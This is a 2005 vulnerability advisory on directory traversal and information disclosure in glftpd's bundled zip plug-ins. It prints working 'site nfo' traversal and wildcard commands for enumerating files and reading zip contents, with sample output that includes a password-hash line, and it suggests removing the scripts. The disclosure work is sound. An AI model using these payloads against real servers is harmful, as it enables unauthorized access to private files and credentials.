
glftpd.txt
Posted Feb 25, 2005
Authored by Paul Craig | Site pimp-industries.com

glftpd versions 1.26 to 2.00 suffer from directory traversal and information disclosure vulnerabilities.

tags | exploit, vulnerability, info disclosure
SHA-256 | 110718097e5a28b9268a6032bf6f96515d6bdfd15d196ff2016190c1161b2bf3

                     Pimp industries.
"Its all about the Bling, B^!%@s and Fame!"

Multiple vulnerabilities in Glftpd v1.26 - v2.00 default zip based plug-ins
: sitenfo.sh, sitezipchk.sh, siteziplist.sh

(C) Paul Craig - Pimp Industries 2005


Background
-------------
glftpd is an open source FTP server used by the more 'hardcore' of FTP
sites :) (www.glftpd.com)


Exploit:
-------------
The flaws are not in glftpd itself but in a suite of zip based plug-ins
that ship with the glftpd package by default; these plug-ins are widely
used in glftpd installations.
This advisory focuses on the plug-in sitenfo.sh, a script that allows
users to read .nfo and .diz files from within zip archives ("SITE NFO" by
default), although the same flaws apply to all of the .sh scripts listed
above.

Due to improper input validation, several flaws exist in the script that
allow unprivileged access to files within the glftpd chroot and
information disclosure of private files.

Firstly.
Directory traversal to prove the existence of a valid file outside of
the ftp site root:

ftp> site nfo ../etc/grouap
200- dn's NFO Lister v1.00
200-
200- That zipfile (../etc/grouap) does not exist!
200 Error executing command.
ftp> site nfo ../etc/group
200- dn's NFO Lister v1.00
200-
200- nfo(s) from ../etc/group:
200-
200 Command Successful.

Here we determine that the file ../etc/group exists, a file outside of the
default FTP site root.

Secondly.
Directory traversal globbing attack:
Due to improper handling of the * wildcard, a user can return the first
two files in any directory ($1 $2), including files within 'private' or
hidden directories such as the 'staff' folder.

ftp> site nfo ../../../../../etc/*
200- dn's NFO Lister v1.00
200-
200- ../../../../../etc/group from ../../../../../etc/ftpd-dsa.pem:

and to list the contents of private folders within the ftp root (which
you are normally unable to see):

ftp> site nfo staff/*
200- dn's NFO Lister v1.00
200-
200- staff/Mark from staff/Peter:
200- Command Successful.
ftp> cd staff
200- No such file or directory.

Here we can see that staff/Mark and staff/Peter exist, although we are
unable to even see the directory staff/ by default, since we have no
access.

This can be further exploited to build a full directory tree by using
guided wildcards within the globbed request, such as:
site nfo ../../../../../etc/a*
site nfo ../../../../../etc/b*
site nfo ../../../../../etc/c*

And so on and so forth to list all valid files and directories.

Finally, you can also use the script to view any file inside any zipfile
within the glftpd root, such as backups or zipfiles in private directories.

First, we find a zip file.

ftp> site nfo ../../*.zip
200- dn's NFO Lister v1.00
200-
200- nfo(s) from ../../backup.zip:

backup.zip exists outside the glftpd site root and is returned in $1 to
sitenfo.sh

Now we will read all files within backup.zip that begin with 'p':
ftp> site nfo ../../backup.zip p*
200- dn's NFO Lister v1.00
200-
200- passwd from ../../backup.zip:
200-
glftpd:$c8aa2099$89be575337e36892c6d7f4181cad175d685162ad:0:0:0:/site:/bin/false

This will of course only work for zip compressed files, not gzip files.

Combined, these flaws allow a user to browse the glftp chrooted
environment and then read any file inside any zip file. Considering zip
files may contain sensitive information such as backups or private
documents, this exploit could easily lead to further privilege escalation.

sitezipchk.sh and siteziplist.sh both contain similar exploits, although I
have noticed sitenfo.sh is more frequently used in glftpd sites.

Suggestions/Work Around:
-------------

The easy solution is to remove sitenfo.sh, siteziplist.sh and
sitezipchk.sh from the /bin directory; passing user supplied arguments to
the shell is never bright and is not worth the security risk.


Company status
---------------
Pimp Industries is a privately owned New Zealand based security research
company.
If you would like to contact Pimp Industries to discuss any nature of
business, please email us at headpimp at pimp-industries.com.


Personal Pimp Hello's fly to:
-------------------
The boys at security-assessment.com, pinky, sozni, and you! yes, you!

Paul Craig
Head Pimp, Security Researcher
Pimp Industries
"Move fast, think faster"

